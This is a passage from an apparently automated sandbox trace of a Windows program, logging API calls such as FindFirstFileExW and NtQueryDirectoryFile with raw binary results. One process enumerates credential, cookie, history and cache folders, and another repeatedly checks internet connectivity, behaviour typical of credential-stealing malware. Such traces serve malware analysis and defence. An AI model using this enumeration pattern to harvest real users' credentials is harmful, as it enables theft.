FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,890 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,970 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,980 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,060 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Cookies\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:57,060 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01`\x89\x15(\xf2\x91\xcf\x01 S\xb1\x93\xd5I\xcd\x01\xc0R\xb56\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01P~\xaa6\xf2\x91\xcf\x01\xc0R\xb56\xf2\x91\xcf\x01\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00n\x00d\x00e\x00x\x00.\x00d\x00a\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:57,060 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,060 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,281 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:57,291 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x98\x8a\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x010\xe0\x99\x8e\xd5I\xcd\x01`\x1cY1\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x80\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01@\xde\xac$\xe6\x91\xcf\x01`\x1cY1\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x01`\x1cY1\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,291 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,371 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Application Data\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:57,371 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01@\xde\xac$\xe6\x91\xcf\x01`\x1cY1\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x88\x00\x00\x00\x00\x00\x00\x00\xe0\xcf\xa9$\xe6\x91\xcf\x01\x10W\xab$\xe6\x91\xcf\x01\x10W\xab$\xe6\x91\xcf\x01@\xde\xac$\xe6\x91\xcf\x01\xc8\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00 \x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x18\x00F\x00O\x00N\x00T\x00C\x00A\x00~\x001\x00.\x00D\x00A\x00T\x00F\x00o\x00n\x00t\x00C\x00a\x00c\x00h\x00e\x003\x00.\x000\x00.\x000\x00.\x000\x00.\x00d\x00a\x00t\x00\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,371 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,401 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:57,401 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:57,401 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:57,401 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:57,401 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:57,451 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:57,451 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01\xa0J\x95\x8e\xd5I\xcd\x01\xa0J\x95\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdax\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00R\x00E\x00D\x00E\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00e\x00d\x00e\x00n\x00t\x00i\x00a\x00l\x00s\x00\x9b\xb9-\xe7\x00\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01\xa0J\x95\x8e\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,451 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,531 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:57,531 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x001\x009\x00 |
SUCCESS | 0x00000000 | |
| 07:43:57,531 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,611 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:57,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:57,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,611 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,691 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:57,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01\xa0J\x95\x8e\xd5I\xcd\x01\xa0J\x95\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xa0J\x95\x8e\xd5I\xcd\x01p\xe2\x06\xf7\xdf\x91\xcf\x01\xd0\xf1\x1a\xe1\xd5I\xcd\x01\x80< \x93\xd5I\xcd\x01\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00"\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x00s\x00r\x00C\x00l\x00a\x00s\x00s\x00.\x00d\x00a\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xd1\x96\x8e\xd5I\xcd\x01p\xb5\xcdwX\x94\xcf\x010\xd2\xd3wX\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,691 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,691 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,771 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\History\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:57,771 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01P\xac59oI\xcd\x01\x90\xcb\xb36\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\xe0-\x8f\x8e\xd5I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x000\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01 S\xb1\x93\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,771 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,851 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:57,851 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01 S\xb1\x93\xd5I\xcd\x01\xf0\xd9\xb66\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdax\x00\x00\x00\x00\x00\x00\x00\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x9b\xb9-\xe7\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01P~\xaa6\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:57,851 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,851 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,851 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:57,931 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temp\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:57,931 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:57,931 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:57,931 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,012 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:58,012 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x98\x8a\x8e\xd5I\xcd\x01\xc0\x97\x18(\xf2\x91\xcf\x01 %49oI\xcd\x01\x90\xcb\xb36\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00P\x98\x8a\x8e\xd5I\xcd\x01\xb0; (\xf2\x91\xcf\x01 S\xb1\x93\xd5I\xcd\x01\xf0\xd9\xb66\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x00.\x00I\x00E\x005\x000\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01\x80a\xa39\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:58,012 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,092 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:58,092 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x98\x8a\x8e\xd5I\xcd\x01\xb0; (\xf2\x91\xcf\x01 S\xb1\x93\xd5I\xcd\x01\xf0\xd9\xb66\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdap\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00L\x002\x00T\x00Q\x00N\x00W\x00R\x00i\x00p\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:58,092 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,172 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\0L2TQNWR\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:58,172 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,172 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,182 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,202 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:58,202 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:58,202 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:58,202 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:58,202 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:58,262 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4N4Z8BYZ\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:58,262 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,262 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,262 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,442 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\ETUB4DIT\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:58,442 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 